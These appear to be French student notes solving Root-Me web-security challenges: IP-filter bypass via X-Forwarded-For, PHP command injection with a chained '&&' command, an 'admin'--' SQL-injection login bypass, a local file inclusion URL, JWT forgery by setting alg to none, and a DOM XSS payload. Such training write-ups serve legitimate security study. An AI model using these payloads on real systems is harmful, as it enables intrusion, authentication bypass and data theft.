# Notes - TD3

HTTP - Contournement de filtrage IP

→ Postman, headers, X-forwaded-for

PHP - Injection de commande

Dans le textbox : 127.0.0.1&&php -s index.php

SQL injection - Authentification 

username : admin'— (deux tirets)

password : quelquechose...

Local File Inclusion

[http://challenge01.root-me.org/web-serveur/ch16/?files=../admin&f=index.php](http://challenge01.root-me.org/web-serveur/ch16/?files=../admin&f=index.php)

Clé : files=../admin

JSON Web Token (JWT) - Introduction

echo eyJ1c2VybmFtZSI6Imd1ZXN0In0 | base64 -d

Sur le site jwt, la signature est invalide. il nous manque le hash.

[https://token.dev/](https://token.dev/)

[https://jwt.io/](https://jwt.io/)

sur token.dev, on change le alg = none et username = admin; on colle la nouvelle cookie

XSS DOM Based - Introduction

```jsx
var random = Math.random() * (99);
    var number = '70';
    if(random == number) {
        document.getElementById('state').style.color = 'green';
        document.getElementById('state').innerHTML = 'You won this game but you don\'t have the flag ;)';
    }
    else{
        document.getElementById('state').style.color = 'red';
        document.getElementById('state').innerText = 'Sorry, wrong answer ! The right answer was ' + random;
    }
```

Dans le textbox number: '; var number=random;'

- rediriger l'utilisateur vers le site : [https://pipedream.com/](https://pipedream.com/)
- coller une image